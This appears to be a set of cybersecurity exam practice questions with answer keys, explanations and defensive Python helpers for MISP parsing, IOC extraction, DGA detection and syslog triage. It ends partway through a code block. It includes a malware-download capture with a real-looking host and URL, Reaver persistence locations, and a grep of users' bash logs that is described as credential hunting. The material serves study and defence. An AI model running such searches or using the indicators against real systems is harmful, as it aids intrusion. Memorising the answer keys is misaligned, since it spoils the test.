Attackers often use built‐in editing tools that are inadvertently or purposefully exposed to edit files to inject malicious code. In this case, someone has attempted to modify the 404 file displayed by WordPress. Anybody who received a 404 error from this installation could have been exposed to malicious code inserted into the 404 page or simply a defaced 404 page.
UEBA
User entity behavior analytics (UEBA) tools focus on behaviors rather than on a broad set of organizational data
MDR
managed detection response (MDR) systems are used to speed up detection, rather than for compliance and orchestration.
151- While reviewing a Wireshark packet capture, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with the IP address in question, if he investigates it in person?
- An encrypted RAT
- A VPN application
- A secure web browser
- A base64‐encoded packet transfer utility
A VPN application
Encapsulating Security Payload (ESP) packets are part of the IPsec protocol suite and are typically associated with a tunnel or VPN. Ryan should check for a VPN application and determine what service or system the user may have connected to.
153- How does data enrichment differ from threat feed combination?
- Data enrichment is a form of threat feed combination for security insights, focuses on adding more threat feeds together for a full picture, and removes third‐party data to focus on core data elements rather than adding together multiple data sources.
- Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
- Threat feed combination is more useful than data enrichment because of its focus on only the threats.
- Threat feed combination techniques are mature, and data enrichment is not ready for enterprise use.
Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
Data enrichment combines data from multiple sources such as directories, geolocation information, and other data sources as well as threat feeds to provide deeper and broader security insights. It is not just a form of threat feed combination, and threat feed combination is a narrower technique than data enrichment is.
155- Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
- Use sha1sum to generate a hash for the file and write a script to check it periodically.
- Install and use Tripwire.
- Periodically check the MAC information for the file using a script.
- Encrypt the file and keep the key secret so the file cannot be modified.
Install and use Tripwire.
Tripwire and similar programs are designed to monitor files for changes and to report on changes that occur. They rely on file fingerprints (hashes) and are designed to be reliable and scalable. Kathleen’s best bet is to use a tool designed for the job, rather than to try to write her own.
156- Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization’s administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?
- Anomalies in privileged account usage
- Time‐based login information
- A mobile device profile change
- DNS request anomalies
Anomalies in privileged account usage
In this case, if the user is logged in to administrative systems, privileged account usage would be the most useful additional detail that Alaina could have available. Time‐based login information might also prove useful, but a traveling administrative user might simply be in another time zone. Mobile device profile changes and DNS request anomalies are less likely to be correlated with a remote exploit and more likely to be correlated with a compromise of a user device or malware respectively. Rank Software provides a great threat hunting playbook at www.osintme.com/wp-content/uploads/2022/09/Threat_Hunting_Playbook.pdf that may prove useful to you as you consider these threats.
158- Fiona is considering a scenario in which components that her organization uses in its software that come from public GitHub repositories are Trojaned. What should she do first to form the basis of her proactive threat‐hunting effort?
- Search for examples of a similar scenario.
- Validate the software currently in use from the repositories.
- Form a hypothesis.
- Analyze the tools available for this type of attack.
Form a hypothesis.
Forming a hypothesis should be Fiona’s next step. Once she starts to consider a scenario, she needs to identify the target and likely adversary techniques and determine how she would verify the hypothesis.
160- Micah wants to use the data he has collected to help with his threat‐hunting practice. What type of approach is best suited to using large volumes of log and analytical data?
- Hypothesis‐driven investigation
- Investigation based on indicators of compromise
- Investigation based on indications of attack
- AI/ML‐based investigation
AI/ML‐based investigation
Artificial intelligence (AI) and machine learning (ML) approaches are ideal for large volumes of log and analytical data. Manual processes like hypothesis‐driven investigations, or IOC‐ or IOA‐driven investigations, can take significant amounts of time when dealing with large volumes of data.
162- As part of her threat‐hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?
- To increase the complexity of analysis
- To leverage the similarity of threat profiles
- To mix sensitivity levels
- To provide a consistent baseline for threats
To leverage the similarity of threat profiles
Bundling critical assets into groups allows similar assets to be assessed together, leveraging the similarity of their threat profiles. This makes analysis less complex, rather than more complex. Assets should be grouped by similar sensitivity levels, rather than mixed. Threats are assessed against other threats for comparison purposes, and bundling assets will not provide a baseline for them.
167- Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?
- IOCs
- Methods of data ingestion
- SCAP connections
- Attack vectors
Methods of data ingestion
SOAR systems offer many ways to ingest data, and syslog, APIs, email, STIX/TAXII feeds, and database connections are all common ways for data to be acquired.
169- Mila is reviewing feed data from the MISP open‐source threat intelligence tool and sees the following entry:
"Unit 42 has discovered a new malware family we've named
"Reaver" with ties to attackers who use SunOrcal malware.
SunOrcal activity has been documented to at least 2013, and
based on metadata surrounding some of the C2s, may have been
active as early as 2010. The new family appears to have been in
the wild since late 2016 and to date we have only identified 10
unique samples, indicating it may be sparingly used. Reaver is
also somewhat unique in the fact that its final payload is in
the form of a Control panel item, or CPL file. To date, only
0.006% of all malware seen by Palo Alto Networks employs this
technique, indicating that it is in fact fairly rare.", "Tag":
[{"colour": "#00223b", "exportable": true, "name":
"osint:source-type="blog-post""}], "disable_correlation":
false, "object_relation": null, "type": "comment"}, {"comment":
"", "category": "Persistence mechanism", "uuid":
"5a0a9d47-1c7c-4353-8523-440b950d210f", "timestamp": "1510922426",
"to_ids": false, "value": "%COMMONPROGRAMFILES%\services\",
"disable_correlation": false, "object_relation": null, "type":
"regkey"}, {"comment": "", "category": "Persistence mechanism",
"uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp":
"1510922426", "to_ids": false, "value":
"%APPDATA%\microsoft\mmc\", "disable_correlation": false,
"object_relation": null, "type": "regkey"}, {"comment": "",
"category": "Persistence mechanism", "uuid":
"5a0a9d47-91e0-4fea-8a8d-48ce950d210f", "timestamp": "1510922426",
"to_ids": false, "value":
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer
Shell Folders\Common Startup"
How does the Reaver malware maintain persistence?
- A blog post
- Inserts itself into the Registry
- Installs itself as a runonce key
- Requests user permission to start up
Inserts itself into the Registry
The attribute that answers the question is the last one: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Startup, the Registry value that tells Windows where the all-users Startup folder lives, so anything placed there runs at logon. The two other "Persistence mechanism" attributes are file system locations (under %COMMONPROGRAMFILES% and %APPDATA%) where the malware drops its files, even though MISP records them with type "regkey". Nothing in the entry points to a RunOnce key or to prompting the user, and the blog post is the source of the intelligence, not a persistence mechanism. So, as described, Reaver maintains persistence by inserting itself into the Registry.
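The persistence attributes in an entry like this can be pulled out programmatically rather than read by eye. The following Python is an added example, not code from the flashcards or from the MISP project. It runs over a constructed event that mirrors the structure of the excerpt above (the attribute values, to_ids flags and the extra HKCU Run key are made up for the example), splits the "Persistence mechanism" attributes into true registry keys and file system paths based on the value rather than the declared type, and notes which ones the feed marked to_ids for automated detection.

```python
"""Pull persistence indicators out of a MISP event.

Added example, not part of the original flashcards or of MISP itself. The
event below is constructed to mirror the structure of the Reaver excerpt
(a few attributes of category "Persistence mechanism"); the registry/path
values, to_ids flags and the extra Run key are made up for the example.
"""
import json
import re

# Constructed MISP-style event JSON (abbreviated to the fields used here).
SAMPLE_EVENT = json.dumps({
    "Event": {
        "info": "Example event modelled on a MISP OSINT feed entry",
        "Attribute": [
            {"category": "External analysis", "type": "comment",
             "to_ids": False, "value": "Blog post describing the family."},
            {"category": "Persistence mechanism", "type": "regkey",
             "to_ids": False, "value": "%COMMONPROGRAMFILES%\\services\\"},
            {"category": "Persistence mechanism", "type": "regkey",
             "to_ids": False, "value": "%APPDATA%\\microsoft\\mmc\\"},
            {"category": "Persistence mechanism", "type": "regkey",
             "to_ids": False,
             "value": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup"},
            {"category": "Persistence mechanism", "type": "regkey",
             "to_ids": True,
             "value": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|updater"},
            {"category": "Network activity", "type": "domain",
             "to_ids": True, "value": "example.invalid"},
        ],
    }
})

# A value must start with a registry hive to count as a real registry path.
_HIVE_RE = re.compile(r"^(HKLM|HKCU|HKU|HKCR|HKCC|HKEY_[A-Z_]+)\\", re.IGNORECASE)
# Autostart locations worth a closer look when they appear in a key path.
_AUTOSTART_RE = re.compile(r"\\(Run|RunOnce|Shell Folders|Winlogon|Services)\b", re.IGNORECASE)


def classify_persistence(event_json: str) -> dict:
    """Return persistence indicators split into registry keys and file paths.

    MISP tags a value with type "regkey" even when the value is a file system
    path (as in the Reaver excerpt), so the split is made on the value itself,
    not on the declared type.
    """
    event = json.loads(event_json)["Event"]
    result = {"registry": [], "paths": [], "autostart": [], "detection_ready": []}
    for attr in event.get("Attribute", []):
        if attr.get("category") != "Persistence mechanism":
            continue
        value = attr["value"]
        if _HIVE_RE.match(value):
            # MISP's "regkey|value" form: key on the left, value name on the right.
            key = value.split("|", 1)[0]
            result["registry"].append(key)
            if _AUTOSTART_RE.search(key):
                result["autostart"].append(key)
        else:
            result["paths"].append(value)
        if attr.get("to_ids"):
            result["detection_ready"].append(value)
    return result


def persistence_summary(event_json: str) -> str:
    """One-line summary suitable for a hunting note."""
    c = classify_persistence(event_json)
    return (f"{len(c['registry'])} registry key(s), {len(c['paths'])} file path(s), "
            f"{len(c['autostart'])} autostart location(s), "
            f"{len(c['detection_ready'])} marked to_ids for automated detection")


if __name__ == "__main__":
    print(json.dumps(classify_persistence(SAMPLE_EVENT), indent=2))
    print(persistence_summary(SAMPLE_EVENT))
```

Only attributes the feed marks to_ids are meant to be pushed into detection tooling as-is; the others (here, the Common Startup key and the two drop paths) are context for a hunt.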
170- Isaac’s organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?
- Signature‐based analysis
- A Babbage machine
- Machine learning
- Artificial network analysis
Machine learning
Machine learning (ML) in systems like this relies on datasets to build profiles of behavior that it then uses to identify abnormal behavior. They also use behavioral data that is frequently associated with attacks and malware and use that to compare to the user behavior patterns. Signature‐based analysis uses hashing or other related techniques to verify if files match a known malware package. The Babbage machine is a mechanical computer, and artificial network analysis was made up for this question.
171- What is the advantage of a SOAR system over a traditional SIEM system?
- SOAR systems are less complex to manage.
- SOAR systems handle large log volumes better using machine learning.
- SOAR systems integrate a wider range of internal and external systems.
- SOAR logs are transmitted only over secure protocols.
SOAR systems integrate a wider range of internal and external systems.
Although SIEM and SOAR systems often have similar functionality, SOAR systems are typically designed to work with a broader range of internal and external systems, including threat intelligence feeds and other data sources, and then assist with the automation of responses.
172- Fiona has continued her threat‐hunting efforts and has formed a number of hypotheses. What key issue should she consider when she reviews them?
- The number of hypotheses
- Her own natural biases
- Whether they are strategic or operational
- If the attackers know about them
Her own natural biases
A single analyst working alone is limited by their own knowledge and experience and is subject to their own experiential biases. Fiona should therefore review her hypotheses for her own natural biases and may want to involve other analysts or experts to help control for them.
173- Nathan wants to determine which systems are sending the most traffic on his network. What low‐overhead data‐gathering methodology can he use to view traffic sources, destinations, and quantities?
- A network sniffer to view all traffic
- Implementing NetFlow
- Implementing SDWAN
- Implementing a network tap
Implementing NetFlow
A NetFlow or sFlow implementation can provide Nathan with the data he needs. Flows show the source, destination, type of traffic, and amount of traffic, and if he collects flow information from the correct locations on his network, he will have the ability to see which systems are sending the most traffic and will also have a general idea of what the traffic is. A sniffer requires more resources, whereas SDWAN is a software‐defined wide area network, which might provide some visibility but does not necessarily meet his needs. Finally, a network tap is used to capture data, but a tap alone does not analyze or provide this information.
NetFlow
NetFlow is a network protocol originally developed by Cisco that collects IP traffic information, which allows for network traffic monitoring. A typical flow record includes the source and destination IP addresses and ports and the class of service, which helps identify service problems and baseline typical network behavior, and can also be useful in identifying unexpected behaviors.
175- Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?
Packet list from the capture (transcribed from the image):

No. | Time | Source | Destination | Protocol | Length | Info
-----|----------|--------------|-----------------|----------|--------|----
1332 | 75.818300 | 172.17.8.8 | 172.17.8.174 | DNS | 88 | Standard query response 0x5b71 A blueflag.xyz A 49.51.172.56
1333 | 75.824177 | 172.17.8.174 | 49.51.172.56 | TCP | 66 | 49731 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
1334 | 75.927162 | 172.17.8.174 | 172.17.8.8 | DNS | 81 | Standard query 0x79ec A wpad.one-hot-mess.com
1335 | 75.927488 | 172.17.8.8 | 172.17.8.174 | DNS | 160 | Standard query response 0x79ec No such name A wpad.one-hot-mess.com SOA one-hot-mess-dc.one-hot-mess.com
1336 | 75.927933 | 172.17.8.174 | 172.17.8.8 | DNS | 76 | Standard query 0x5aaa A wpad.localdomain
1337 | 75.928152 | 172.17.8.8 | 172.17.8.174 | DNS | 151 | Standard query response 0x5aaa No such name A wpad.localdomain SOA a.root-servers.net
1338 | 76.073948 | 49.51.172.56 | 172.17.8.174 | TCP | 58 | 80 → 49731 [SYN, ACK] Seq=1 Ack=1 Win=64240 Len=0 MSS=1460
1339 | 76.073962 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=1 Ack=1 Win=64240 Len=0
1340 | 76.074274 | 172.17.8.174 | 49.51.172.56 | HTTP | 232 | GET /ncvQQQHC8jZftiJvyvGA/yrkbdmt.bin HTTP/1.1
1341 | 76.074421 | 49.51.172.56 | 172.17.8.174 | TCP | 54 | 80 → 49731 [ACK] Seq=1 Ack=179 Win=64240 Len=0
1342 | 76.410999 | 49.51.172.56 | 172.17.8.174 | TCP | 1202 | 80 → 49731 [PSH, ACK] Seq=1 Ack=179 Win=64240 Len=1228 [TCP segment of a reassembled PDU]
1343 | 76.411109 | 49.51.172.56 | 172.17.8.174 | TCP | 1514 | 80 → 49731 [ACK] Seq=1229 Ack=179 Win=64240 Len=1460 [TCP segment of a reassembled PDU]
1344 | 76.411127 | 49.51.172.56 | 172.17.8.174 | TCP | 1050 | 80 → 49731 [PSH, ACK] Seq=2689 Ack=179 Win=64240 Len=996 [TCP segment of a reassembled PDU]
1345 | 76.411564 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=179 Ack=3685 Win=60224 Len=0
1346 | 76.415378 | 49.51.172.56 | 172.17.8.174 | TCP | 1282 | 80 → 49731 [PSH, ACK] Seq=3685 Ack=179 Win=64240 Len=1228 [TCP segment of a reassembled PDU]
1347 | 76.415864 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=179 Ack=4913 Win=63012 Len=0
1348 | 76.422802 | 49.51.172.56 | 172.17.8.174 | TCP | 1514 | 80 → 49731 [ACK] Seq=4913 Ack=179 Win=64240 Len=1460 [TCP segment of a reassembled PDU]
1349 | 76.422843 | 49.51.172.56 | 172.17.8.174 | TCP | 1050 | 80 → 49731 [PSH, ACK] Seq=6373 Ack=179 Win=64240 Len=996 [TCP segment of a reassembled PDU]
1350 | 76.423086 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=179 Ack=7369 Win=64240 Len=0
1351 | 76.427437 | 49.51.172.56 | 172.17.8.174 | TCP | 1514 | 80 → 49731 [ACK] Seq=7369 Ack=179 Win=64240 Len=1460 [TCP segment of a reassembled PDU]
1352 | 76.427453 | 49.51.172.56 | 172.17.8.174 | TCP | 1050 | 80 → 49731 [PSH, ACK] Seq=8829 Ack=179 Win=64240 Len=996 [TCP segment of a reassembled PDU]
1353 | 76.427822 | 172.17.8.174 | 49.51.172.56 | TCP | 54 | 49731 → 80 [ACK] Seq=179 Ack=9825 Win=64240 Len=0
1354 | 76.434833 | 49.51.172.56 | 172.17.8.174 | TCP | 1514 | 80 → 49731 [ACK] Seq=9825 Ack=179 Win=64240 Len=1460 [TCP segment of a reassembled PDU]
- 172.17.8.8
- 49.51.172.56
- 172.17.8.172
- 56.172.51.49
49.51.172.56
The client 172.17.8.174 resolves blueflag.xyz to 49.51.172.56 (frame 1332), opens a TCP connection to port 80 on that address, and issues GET /ncvQQQHC8jZftiJvyvGA/yrkbdmt.bin (frame 1340); the server then pushes back a multi-segment response, which is the binary being downloaded. Annie should record 49.51.172.56, the domain blueflag.xyz and the URL path as indicators of compromise (IOCs), search for other traffic to or from that host, and look at what 172.17.8.174 does next. 172.17.8.8 is only the DNS server that answered the query, and the other two addresses offered do not appear in the capture.
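The pivot described above (tie the HTTP GET to the DNS answer that produced the server address, then record the resulting indicators) is easy to script over a packet-list export. The following Python is an added example, not code from the flashcards or from Wireshark. It parses a constructed, pipe-delimited packet list in the same column order as the table above; the client, resolver and server addresses and the domain are made up, while the URL path is the one shown in the capture.

```python
"""Pivot from an HTTP download in a packet-list export to its indicators.

Added example (not from the original flashcards). The rows below are a
constructed, pipe-delimited packet list in the column order shown in the
question (No. | Time | Source | Destination | Protocol | Length | Info).
Addresses and the domain are made up; the URL path is the one in the capture.
"""
import re

PACKET_LIST = """\
1332 | 75.818300 | 10.0.0.53 | 10.0.0.20 | DNS | 88 | Standard query response 0x5b71 A dl.example.invalid A 203.0.113.77
1333 | 75.824177 | 10.0.0.20 | 203.0.113.77 | TCP | 66 | 49731 → 80 [SYN] Seq=0 Win=64240 Len=0
1334 | 75.927162 | 10.0.0.20 | 10.0.0.53 | DNS | 81 | Standard query 0x79ec A wpad.corp.invalid
1335 | 75.927488 | 10.0.0.53 | 10.0.0.20 | DNS | 160 | Standard query response 0x79ec No such name A wpad.corp.invalid SOA dc.corp.invalid
1338 | 76.073948 | 203.0.113.77 | 10.0.0.20 | TCP | 58 | 80 → 49731 [SYN, ACK] Seq=1 Ack=1 Win=64240 Len=0
1340 | 76.074274 | 10.0.0.20 | 203.0.113.77 | HTTP | 232 | GET /ncvQQQHC8jZftiJvyvGA/yrkbdmt.bin HTTP/1.1
1342 | 76.410999 | 203.0.113.77 | 10.0.0.20 | TCP | 1282 | 80 → 49731 [PSH, ACK] Seq=1 Ack=179 Win=64240 Len=1228
1360 | 80.100000 | 10.0.0.20 | 198.51.100.9 | HTTP | 210 | GET /index.html HTTP/1.1
"""

# File extensions that usually mean executable content and are worth a pivot.
SUSPECT_EXT = (".bin", ".exe", ".dll", ".cpl", ".scr", ".ps1", ".hta")

_DNS_ANSWER_RE = re.compile(r"Standard query response \S+ A (\S+) A (\d+\.\d+\.\d+\.\d+)")
_HTTP_GET_RE = re.compile(r"^GET (\S+) HTTP/\d\.\d")


def parse_rows(text):
    """Turn the pipe-delimited packet list into dicts, one per frame."""
    rows = []
    for line in text.strip().splitlines():
        no, time, src, dst, proto, length, info = (f.strip() for f in line.split("|", 6))
        rows.append({"no": int(no), "time": float(time), "src": src, "dst": dst,
                     "proto": proto, "len": int(length), "info": info})
    return rows


def find_download_iocs(text):
    """Return IOCs for every HTTP GET of a suspicious file in the packet list.

    The DNS pass runs first so a later GET can be tied back to the name that
    resolved to the server, which is what you would block or search for.
    """
    rows = parse_rows(text)
    name_for_ip = {}
    for r in rows:
        if r["proto"] == "DNS":
            m = _DNS_ANSWER_RE.search(r["info"])
            if m:
                name_for_ip[m.group(2)] = m.group(1)
    iocs = []
    for r in rows:
        if r["proto"] != "HTTP":
            continue
        m = _HTTP_GET_RE.match(r["info"])
        if not m or not m.group(1).lower().endswith(SUSPECT_EXT):
            continue
        server = r["dst"]
        iocs.append({
            "frame": r["no"],
            "client": r["src"],
            "server": server,
            "domain": name_for_ip.get(server),
            "url": f"http://{name_for_ip.get(server, server)}{m.group(1)}",
            # Frame bytes the server sent back to this client after the GET.
            "bytes_returned": sum(x["len"] for x in rows
                                  if x["src"] == server and x["dst"] == r["src"]
                                  and x["time"] > r["time"]),
        })
    return iocs


if __name__ == "__main__":
    for ioc in find_download_iocs(PACKET_LIST):
        print(ioc)
```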
176- Steve uploads a malware sample to an analysis tool and receives the following messages:
> Executable file was dropped: C:\Logs\mffcae1.exe
Child process was created, parent C:\Windows\system32\cmd.exe
mffcae1.exe connects to unusual port
File downloaded: cx99.exe
If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?
- An antimalware tool
- Wireshark
- An IPS
- Network flows
Wireshark
Steve could use Wireshark to capture the download traffic and to observe what host the file was downloaded from. Antimalware tools typically remove the malware but do not provide detailed visibility into its actions. An IPS can detect attacks but would need specific rules to detect the actions taken. Network flows will show where the traffic went but will not provide detailed specifics like a packet capture tool would.
177- Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same datacenter, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., and one records the entry at 6 p.m. What issue has Abdul likely encountered?
- A malware infection emulating a legitimate process
- An incorrect time zone setting
- A flaw in the automation script
- A log entry error
An incorrect time zone setting
A relatively common issue during log reviews is incorrect or mismatched time zone settings. Many organizations that operate in more than one time zone log in Coordinated Universal Time (UTC) to avoid having to apply time zone corrections when comparing logs. In this case, Abdul should check the server that is recording the events at 6 p.m. to see whether it is set to the wrong time zone or is otherwise misconfigured with the wrong system time.
ingress vs egress
Ingress refers to something entering a system or network, while egress refers to something exiting a system or network.
178- What do DLP systems use to classify data and to ensure that it remains protected?
- Data signatures
- Business rules
- Data egress filters
- Data at rest
Business rules
Data loss prevention (DLP) systems use business rules that define when and how data is allowed to move around an organization, as well as how it should be classified. Data at rest is data that is not moving, and the remaining options were made up for this question.
181- Eric wants to analyze a malware binary in the safest way possible. Which of the following methods has the least likelihood of allowing the malware to cause problems?
- Running the malware on an isolated VM
- Performing dynamic analysis of the malware in a sandbox
- Performing static analysis of the malware
- Running the malware in a container service
Performing static analysis of the malware
Although an isolated VM, a sandbox, or a container reduces the risk, every method that executes the sample gives it a chance to escape or to cause collateral damage. Static analysis examines the binary (headers, strings, imports, disassembly) without running it, so it is the safest choice. The trade-off is that it may be less informative than dynamic analysis, which captures what the malware actually does as it runs, and it can be considerably slower because of the effort required to disassemble and reverse-engineer the code, especially when the sample is packed or obfuscated.
182- Tom wants to improve his detection capabilities for his software‐as‐a‐service (SaaS) environment. What technology is best suited to give him a view of usage, data flows, and other details for cloud environments?
- EDR
- CASB
- IDS
- SIEM
CASB
A cloud access security broker (CASB) is the ideal tool to increase Tom’s visibility into cloud services. CASB tools are specifically designed to monitor for cloud access patterns and to ensure that unwanted activity does not occur.
183- Juan wants to audit filesystem activity in Windows and configures Windows filesystem auditing. What setting can he set to know if a file was changed or not using Windows file auditing?
- Set Detect Change
- Set Validate File Versions
- Set Audit Modifications
- None of the above
None of the above
None of the listed settings exist, and Windows filesystem auditing does not tell Juan whether a file's contents were actually changed. Object access auditing (Security log event ID 4663) records that a handle to the file was used with particular access rights, such as WriteData, so it can show that a process opened a file for writing and which process did so, but not whether or how the content differed afterwards. File integrity monitoring tools such as Tripwire, which record and compare file hashes, are what identify modifications.
184- Naomi wants to analyze URLs found in her passive DNS monitoring logs to find domain generation algorithm (DGA)–generated command‐and‐control links. What techniques are most likely to be useful for this?
- WHOIS lookups and NXDOMAIN queries of suspect URLs
- Querying URL allowlists
- DNS probes of command‐and‐control networks
- Natural language analysis of domain names
WHOIS lookups and NXDOMAIN queries of suspect URLs
URL analysis of domain generation algorithm–created uniform resource locators (URLs) relies on either testing URLs via WHOIS lookups and NXDOMAIN responses or using machine learning (ML) techniques, which recognize patterns common to DGA‐generated URLs. Natural language processing focuses on understanding natural language data, but DGAs do not rely on natural language–style URLs in most cases.
DGA
A domain generation algorithm (DGA) is a technique used by malicious actors, often in malware, that generates domain names algorithmically.
Here are some key aspects of DGAs:
- Malware may use DGAs to create numerous, seemingly random domain names to use for command-and-control (C&C) communication.
- The rapidly changing domain names associated with DGAs make it more difficult to block the communication, because even if some hosts are taken down, the malware can rotate to new names.
- Detecting DGA-created URLs often relies on testing URLs via WHOIS lookups and Non-Existent Domain (NXDOMAIN) responses or using machine learning techniques that recognize patterns common to DGA-generated URLs
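As an added example (not from the flashcards, and not any particular product's logic), the following Python applies both of the signals described above to a constructed passive DNS log: the share of a client's lookups that return NXDOMAIN, and a few lexical features of the queried names (entropy, digit and vowel ratios, consonant runs) standing in for the pattern recognition an ML model would learn from real data. The log lines, client addresses, domains and thresholds are all made up for the example and would need tuning against real traffic.

```python
"""Flag likely DGA domains in passive DNS data.

Added example, not from the original flashcards. Two signals are combined:
the NXDOMAIN rate per client (DGA malware resolves many names that do not
exist yet) and lexical features of the names (a crude stand-in for what an
ML classifier learns). Log lines, clients, domains and thresholds are made up.
"""
import math
import re
from collections import Counter, defaultdict

# Constructed passive-DNS log: "client query rcode"
PDNS_LOG = """\
10.0.0.20 www.example.com NOERROR
10.0.0.20 mail.example.com NOERROR
10.0.0.20 cdn.example.org NOERROR
10.0.0.31 qxjtbv4k2zp.net NXDOMAIN
10.0.0.31 h7wnd0rfq1xle.com NXDOMAIN
10.0.0.31 ztk9pvm3bq.info NXDOMAIN
10.0.0.31 update.example.net NOERROR
10.0.0.31 lw2c8vqjdn7t.biz NXDOMAIN
10.0.0.31 y6rkmzd1fpv.org NXDOMAIN
10.0.0.42 wpad.corp.invalid NXDOMAIN
10.0.0.42 intranet.corp.invalid NOERROR
"""

VOWELS = set("aeiou")


def shannon_entropy(s):
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def lexical_score(domain):
    """Score the registrable label of a domain; higher means more DGA-like.

    Features: character entropy, digit ratio, vowel ratio and the longest run
    of consonants. Thresholds are illustrative, not tuned on real data.
    """
    label = domain.split(".")[-2] if "." in domain else domain
    label = label.lower()
    if len(label) < 6:
        return 0.0
    entropy = shannon_entropy(label)
    digits = sum(ch.isdigit() for ch in label) / len(label)
    vowels = sum(ch in VOWELS for ch in label) / len(label)
    longest_consonants = max(len(run) for run in re.split(r"[aeiou0-9]", label))
    score = 0.0
    score += 1.0 if entropy > 3.0 else 0.0
    score += 1.0 if digits > 0.1 else 0.0
    score += 1.0 if vowels < 0.25 else 0.0
    score += 1.0 if longest_consonants >= 4 else 0.0
    return score


def parse_log(text):
    for line in text.strip().splitlines():
        client, qname, rcode = line.split()
        yield client, qname.lower().rstrip("."), rcode


def find_dga_candidates(log_text, nx_ratio_threshold=0.5, lex_threshold=3.0, min_queries=3):
    """Return per-client findings: NXDOMAIN ratio and the DGA-looking names.

    A client is flagged only when most of its lookups fail *and* the failing
    names look algorithmic; a lone wpad.* miss (normal on Windows networks)
    does not qualify.
    """
    per_client = defaultdict(list)
    for client, qname, rcode in parse_log(log_text):
        per_client[client].append((qname, rcode))
    findings = {}
    for client, queries in per_client.items():
        if len(queries) < min_queries:
            continue
        nx = [q for q, rc in queries if rc == "NXDOMAIN"]
        ratio = len(nx) / len(queries)
        suspicious = sorted(q for q in nx if lexical_score(q) >= lex_threshold)
        if ratio >= nx_ratio_threshold and suspicious:
            findings[client] = {"nxdomain_ratio": round(ratio, 2), "dga_like": suspicious}
    return findings


if __name__ == "__main__":
    print(find_dga_candidates(PDNS_LOG))
```

The names that survive both filters are the ones worth WHOIS lookups: a DGA domain that does resolve is usually registered very recently, often days before the malware starts using it.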
186- Lucca is reviewing bash command history logs on a system that he suspects may have been used as part of a breach. He discovers the following grep command run inside of the /users directory by an administrative user. What will the command find?
grep -r "sudo" /home/users/ | grep "bash.log"
- All occurrences of the sudo command on the system
- All occurrences of root logins by users
- All occurrences of the sudo command in bash log files in user home directories
- All lines that do not contain the word sudo or bash.log in user directories
All occurrences of the sudo command in bash log files in user home directories
The first grep searches recursively under /home/users/ for lines containing "sudo"; because grep -r prefixes each match with the path of the file it came from, the second grep keeps only those output lines that contain "bash.log", in practice the hits from files named bash.log in the user home directories. Either command alone would return far more: the first every mention of sudo in any file under those directories, and a search of bash.log files alone every command the users ran. In this scenario the attacker may have been looking for credentials that users had typed on the command line along with sudo.
187- Cynthia wants to build scripts to detect malware beaconing behavior. Which of the following is not a typical means of identifying malware beaconing behavior on a network?
- Persistence of the beaconing
- Beacon protocol
- Beaconing interval
- Removal of known traffic
Beacon protocol
Unless she already knows the protocol that a particular beacon uses, filtering out beacons by protocol may cause her to miss beaconing behavior. Attackers want to dodge common analytical tools and will use protocols that are less likely to attract attention. Filtering network traffic for beacons based on the intervals and frequency they are sent at, if the beacon persists over time, and removing known traffic are common means of filtering traffic to identify beacons.
188- Eric has access to a full suite of network monitoring tools and wants to use appropriate tools to monitor network bandwidth consumption. Which of the following is not a common method of monitoring network bandwidth usage?
- SNMP
- Portmon
- Packet sniffing
- NetFlow
Portmon
SNMP, packet sniffing, and NetFlow are commonly used when monitoring bandwidth consumption. Portmon is an aging Windows tool used to monitor serial and parallel ports, not exactly the sort of tool you’d use to watch your network’s bandwidth usage!
217- Brendan is reviewing a series of syslog entries and notices several with different logging levels. Which one of the following messages should he review first?
- Level 0
- Level 1
- Level 5
- Level 7
Level 0
Syslog severity levels indicate the urgency of a message and are numbered 0 through 7, with 0 the most urgent: level 0 is emergency, 1 is alert, 2 is critical, 3 is error, 4 is warning, 5 is notice, 6 is informational, and 7 is debug. Brendan should review the level 0 message first. On the wire the severity is carried together with the facility in the PRI field at the start of the message (PRI = facility × 8 + severity), so a tool that sorts by severity has to decode that field first.
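The following Python is an added example, not code from the flashcards: it decodes the PRI field of constructed RFC 3164-style messages into facility and severity and returns the messages in review order, most urgent first, keeping only those at or above a cutoff. Hostnames and message text are made up.

```python
"""Decode syslog PRI values and triage messages by severity.

Added example, not part of the original flashcards. The messages below are
constructed RFC 3164-style lines; the hostnames and text are made up.
"""
import re

SEVERITY_NAMES = ["emergency", "alert", "critical", "error",
                  "warning", "notice", "informational", "debug"]

# PRI = facility * 8 + severity, sent as "<PRI>" at the start of the message.
_PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.DOTALL)

SAMPLE_MESSAGES = [
    "<134>Jul  4 09:33:08 proxy01 squid[2211]: GET http://example.invalid/ - 200",   # local0.info
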